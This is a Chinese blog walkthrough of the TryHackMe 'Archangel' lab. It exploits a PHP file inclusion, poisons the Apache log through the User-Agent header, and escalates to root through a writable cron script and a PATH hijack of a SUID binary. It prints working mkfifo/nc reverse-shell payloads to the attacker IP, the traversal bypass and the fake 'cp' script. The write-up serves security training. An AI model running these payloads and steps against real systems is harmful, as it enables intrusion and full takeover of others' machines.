TryHackMe-Archangel

最新推荐文章于 2024-09-24 13:45:00 发布
最新推荐文章于 2024-09-24 13:45:00 发布
阅读量839 收藏
点赞数
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: 本地文件包含 boot2root 权限提升 渗透测试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/128721415
版权

Archangel

一家著名的安全解决方案公司似乎正在他们的实时机器上进行一些测试。利用它的最佳时机。

这几天刷的都是中等难度的web的题,也快春节了,眼看中等难度的题越刷越少,还是留一点给以后玩。

现在开始玩玩简单难度的题,刷刷分

到春节我要开始挑战Hololive,加强自己的Windows AD能力,到那时候我会尝试适应添加截图的,毕竟之前我所有的文章都没有截图。

端口扫描

循例 nmap 扫:

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Web枚举

进入web一看,一套网页模板,题目要我们找到其域名,

在默认页面:

Send us a mail:
support@mafialive.thm

非常明显就是mafialive.thm

将其添加到/etc/hosts

访问mafialive.thm即可获得第一个flag

gobuster,你走吧不需要你了

好巧不巧,我在翻看burp的请求日志的时候,发现mafialive.thm/访问了robots.txt:

User-agent: *
Disallow: /test.php

该页面就是测试页面:

Test Page. Not to be Deployed

LFI

该页面有一个按钮,点击后,很明显

妥妥一个文件包含

http://mafialive.thm/test.php?view=/var/www/html/development_testing/mrrobot.php

回显:

Control is an illusion

此文件是php文件这是执行后的结果

我们需要阅读它的源码,php://filter可以帮助我们

使用php://filter来对目标页面进行base64编码

?view=php://filter/read=convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php

将base64解码:

<?php echo 'Control is an illusion'; ?>

好吧,什么屁用都没有

现在我们已知的php页面就两个,第一个我们已经看了,还剩一个那就是test.php,我们也看一下这个php的源码

?view=php://filter/read=convert.base64-encode/resource=/var/www/html/development_testing/test.php

关键代码:

<?php

        //FLAG: thm{e*********1}

            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
        if(isset($_GET["view"])){
        if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
                include $_GET['view'];
            }else{

        echo 'Sorry, Thats not allowed';
            }
    }
?>

这段代码比较简单,一个简单的判断

绕过也很简单,只要使用./隔开…/即可:

.././.././.././../

LFI 进一步利用

现在我们可以访问任意文件,但是为了进一步利用,我们需要找到我们可控的文件

在这种情况下,日志文件绝对是首选

通过抓包查看响应头,或者使用浏览器的wappalyzer,我们可以得知:

Server: Apache/2.4.29 (Ubuntu)

二话不说,直接找apache的日志文件:

?view=/var/www/html/development_testing/.././.././.././.././.././.././.././../var/log/apache2/access.log

我很后悔刚刚使用gobuster扫了一下

.......././.././.././.././../var/apache2/error.log HTTP/1.1" 200 436 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"

可以看到ua,ua我们可控

上burp - Reverse shell

将刚刚的请求丢进repeater

修改请求头的ua:

GET /test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././../var/log/apache2/access.log HTTP/1.1

User-Agent: <?php phpinfo();?>

发送该包两次,我们就能成功看到phpinfo

接下来我们以此getshell

payload:

 <?php system('mkfifo /tmp/f1;nc 10.14.39.48 8888 < /tmp/f1 | /bin/bash > /tmp/f1');?>

将其写到ua上

开启nc监听,请求两次access.log

成功getshell

┌──(root🐦kali)-[/home/sugobet]
└─# nc -vlnp 8888
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 10.10.221.93.
Ncat: Connection from 10.10.221.93:49680.
whoami
www-data

升级shell

python3 -c "import pty;pty.spawn('/bin/bash')"

user.txt:

cd /home/archangel
www-data@ubuntu:/home/archangel$ ls -la
ls -la
total 44
drwxr-xr-x 6 archangel archangel 4096 Nov 20  2020 .
drwxr-xr-x 3 root      root      4096 Nov 18  2020 ..
-rw-r--r-- 1 archangel archangel  220 Nov 18  2020 .bash_logout
-rw-r--r-- 1 archangel archangel 3771 Nov 18  2020 .bashrc
drwx------ 2 archangel archangel 4096 Nov 18  2020 .cache
drwxrwxr-x 3 archangel archangel 4096 Nov 18  2020 .local
-rw-r--r-- 1 archangel archangel  807 Nov 18  2020 .profile
-rw-rw-r-- 1 archangel archangel   66 Nov 18  2020 .selected_editor
drwxr-xr-x 2 archangel archangel 4096 Nov 18  2020 myfiles
drwxrwx--- 2 archangel archangel 4096 Nov 19  2020 secret
-rw-r--r-- 1 archangel archangel   26 Nov 19  2020 user.txt
www-data@ubuntu:/home/archangel$ cat ./user.txt

myfiles文件夹:

www-data@ubuntu:/home/archangel$ ls -la ./myfiles
ls -la ./myfiles
total 12
drwxr-xr-x 2 archangel archangel 4096 Nov 18  2020 .
drwxr-xr-x 6 archangel archangel 4096 Nov 20  2020 ..
-rw-r--r-- 1 root      root        44 Nov 18  2020 passwordbackup
www-data@ubuntu:/home/archangel$ cat ./myfiles/passwordbackup
cat ./myfiles/passwordbackup
youtube/watch?v=dQw4w9WgXcQ

横向移动

www-data@ubuntu:/home/archangel$ ls -la /opt
ls -la /opt
total 16
drwxrwxrwx  3 root      root      4096 Nov 20  2020 .
drwxr-xr-x 22 root      root      4096 Nov 16  2020 ..
drwxrwx---  2 archangel archangel 4096 Nov 20  2020 backupfiles
-rwxrwxrwx  1 archangel archangel   66 Nov 20  2020 helloworld.sh

查看helloworld.sh:

cat ./helloworld.sh
#!/bin/bash
echo "hello world" >> /opt/backupfiles/helloworld.txt

接下来都不用看了,定时任务,并且我们还有权限修改该脚本文件,直接再次reverse shell移动到archangel用户

payload:

echo "mkfifo /tmp/f1;nc 10.14.39.48 9999 < /tmp/f1 | /bin/bash > /tmp/f1" >> ./helloworld.sh

成功getshell

Ncat: Connection from 10.10.221.93.
Ncat: Connection from 10.10.221.93:39692.
python3 -c "import pty;pty.spawn('/bin/bash')"
archangel@ubuntu:~$ id
id
uid=1001(archangel) gid=1001(archangel) groups=1001(archangel)

user2.txt: 现在我们有权访问secret文件夹了

archangel@ubuntu:~$ cd ./secret
cd ./secret
archangel@ubuntu:~/secret$ ls -la
ls -la
total 32
drwxrwx--- 2 archangel archangel  4096 Nov 19  2020 .
drwxr-xr-x 6 archangel archangel  4096 Nov 20  2020 ..
-rwsr-xr-x 1 root      root      16904 Nov 18  2020 backup
-rw-r--r-- 1 root      root         49 Nov 19  2020 user2.txt

环境变量 - 纵向移动|权限提升

secret文件夹下还有有个backup文件并且带suid:

-rwsr-xr-x 1 root      root      16904 Nov 18  2020 backup

直接cat,发现是可执行文件

直接执行:

archangel@ubuntu:~/secret$ ./backup
./backup
cp: cannot stat '/home/user/archangel/myfiles/*': No such file or directory

该程序会将home/user/archangel/myfiles/下进行复制

但事实上我们根本没有权限在/home下创建文件夹

所以我们可以篡改环境变量来执行我们的恶意程序以达到目的

touch ./cp

写入以下内容:

archangel@ubuntu:~/secret$ echo '#!/bin/bash' > ./cp
archangel@ubuntu:~/secret$ echo "/bin/bash -p" >> ./cp

记得修改权限使其可执行:

archangel@ubuntu:~/secret$ chmod 777 ./cp

修改环境变量:

archangel@ubuntu:~/secret$ export PATH=/home/archangel/secret:$PATH

再次执行backup,成功getroot

root@ubuntu:~/secret# id
id
uid=0(root) gid=0(root) groups=0(root),1001(archangel)
root@ubuntu:~/secret# cat /root/root.txt
Sugobet
关注
专栏目录
大天使之剑java源码-ArchAngel_J2ME:J2ME大天使游戏
06-06
大天使之剑 java源码 ArchAngel_J2ME J2ME Arch Angel game
jira-archangel
03-20
吉拉大天使 部署事件工单创建 argocd notify argo wf event ┌───────────────┐ ┌───────────────┐ │ │ │ │ │ │ │ │ │ ├───────► webhook │ ...
TryHackMe-Surfer
M1n9K1n9的博客
01-15 439
哇,看看这个激进的应用程序!不是纳利公子吗?我们一直在浏览一些网页,我们也想让你加入!他们说这个应用程序有一些功能,只能供内部使用 - 但如果你赶上了正确的浪潮,你可能会找到甜蜜的东西!
TryHackMe-渗透测试3_log
M1n9K1n9的博客
12-21 408
/ 穿越 返回上一级后面不可控,%00或0x00 截断注意:%00技巧是固定的,不适用于PHP 5.3.4及更高版本. 一个点代表当前目录/etc/passwd/. 等价于/etc/passwd 绕过如果有…/替换成空字符串可以尝试重写绕过 …//…//…//…//etc/passwd原理也很简单如果前面的路径不可控,可以直接…/穿越。
TryHackMe - Archangel靶场
z4yn:)的博客
02-22 290
Archangel Boot2root, Web exploitation, Privilege escalation, LFI 0x01 信息收集 常规端口扫一波,发现只有22和80端口开放 先从80端口入手,常规的扫目录没有发现有价值的东西 在源代码里发现一个可以的域名 网站找不到突破口,试着修改本地的hosts文件指向改域名,访问后获得第一个flag 在用gobuster扫描网站目录,得到test.php和robots.txt robots....
TryhackmeArchangel(LFI+文件解析漏洞getshell,修改$PATH路径+SUID提权)
二狗的博客
12-20 138
精彩的靶机,学习到很多新知识。LFI拿shell一般有两种姿势:1.LFI+上传文件getshell2.LFI+文件解析漏洞getshell本文用的是第二种。关于第一种方法,我在这个靶机里有记录提权方面,利用了修改环境变量$PATH的方式,这种提权方法需要和SUID结合。本文修改了cp命令,但是也可能修改的是其他命令。比如mv,tar等,这个要根据靶机具体的情况。
arch卸载mysql_archangel
weixin_42302026的博客
01-31 258
一,构建ant环境要使用ant首先要构建一个ant环境,步骤很简单:1),安装jdk,设置JAVA_HOME ,PATH ,CLASS_PATH(这些应该是看这篇文章的人应该知道的)2),下载ant 地址www.apache.org找一个你喜欢的版本,或者干脆最新的版本3),解压ant 你得到的是一个压缩包,解压缩它,并把它放在一个尽量简单的目录,例如D:\ant-1.6虽然你不一定要这么做,但这...
ZeroMQ指南-前言
weixin_34010566的博客
02-19 74
2019独角兽企业重金招聘Python工程师标准>>> ...
SolrRelevancyFAQ --排序
tattarrattat的专栏
10-20 1419
SolrRelevancyFAQ --排序
Pentest-bookmarks v1.5
weixin_33832340的博客
10-22 684
2019独角兽企业重金招聘Python工程师标准>>> ...
大天使之剑java源码-archangel-web:大天使网
06-06
Archangel DLT poc 的 Web 客户端界面。 有两个部分: 简单查询和上传单页webapp。 这是使用 React 用 Ja​​vaScript 编写的。 一个很小的后端,围绕国家档案馆的工具抛出一个最小的 Web API。 前端将文件上传到...
大天使之剑java源码-Archangel:软件开发类项目
06-06
Archangel 是一个提供有关污染的单一资源的网站。 它从许多其他来源收集有关不同类型污染以及您如何对各种原因做出贡献的信息。 它旨在传播对导致污染的不同因素的认识,并与有助于解决问题的慈善机构和技术建立联系...
大天使之剑java源码-superacao-app-archangel:superacao-app-大天使
06-06
大天使之剑 java源码最低限度的知识 节点 打字稿 角 2 离子 2 火力基地 基本设置 该应用程序是使用 Ionic 2 框架使用 TypeScript 语言开发的。要在您的机器上安装 Ionic,您需要在您的机器上安装带有 ...s
设计模式连环炮-建造者模式
koala_boy的专栏
09-18 169
如果有同志看完了前面写的那四篇,就会发现单例和三种工厂模式已经写完了,这也是最入门的四种模式,面试题问到这三种回答不出来,就可以回家等通知了。当然里面还可以有变体,自己去玩吧 稍微有些了解的人,都知道设计模式分了三大类,创建类、行为类、结构类。这里不难看出,是先讲创建类。后面就可能穿插着讲了。 中途解释下,是开局忘了说这个事了哈哈哈哈 在老浣熊生活过的三十万年里,绝大多数时间都是一个神,没有同伴。在人类这种具备高智商的灵长类生物出现进化转折之前,他唯一的乐趣,...
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
09-24 290
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
linux-安全管理-防火墙与网络安全
Flying_Fish_roe的博客
09-16 1883
在 Linux 系统中,防火墙与网络安全是确保系统安全性的重要组成部分。通过合理配置防火墙规则、使用 SSH 密钥认证、启用 SSL/TLS 加密等手段,管理员可以有效防止网络攻击和未经授权的访问。使用iptables或firewalld管理网络流量,限制不必要的服务和端口。加固 SSH 配置,禁用 Root 登录,使用非默认端口,并启用密钥认证。为 Web 服务配置 SSL/TLS 加密,确保通信安全。使用fail2ban等工具防止暴力破解,定期进行端口扫描和系统安全审计。
等保测评:如何应对网络攻击
2301_79955948的博客
09-24 754
进行全面的风险评估,识别潜在的安全威胁,并根据评估结果加强物理安全、网络安全、主机安全、应用安全数据安全及备份恢复等方面的防护措施。:制定或更新安全策略、管理制度和操作规程,确保符合等保测评的要求,并加强安全管理人员的培训。:实施多层防御体系,包括访问控制、入侵检测与防御、数据加密、安全审计等关键技术措施,形成有效的安全防护。:制定详细的应急预案,定期进行安全演练,提升应对突发事件的能力,并建立快速响应团队。
2024年三个月自学 网络安全(黑客技术)手册
2401_85026965的博客
09-21 4242
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
MATLAB入门:矩阵与向量操作
"MATLAB是数学计算和编程的高级环境,尤其适合处理矩阵和向量。这个MATLAB作业1的目的是帮助学习者理解和掌握矩阵与向量的基本概念,因为这是MATLAB处理数据的核心方式。通过这个作业,学习者将学会如何使用简洁的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值